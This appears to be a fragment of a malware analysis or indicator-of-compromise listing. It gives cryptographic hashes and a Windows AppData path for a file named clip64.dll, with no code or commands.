SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4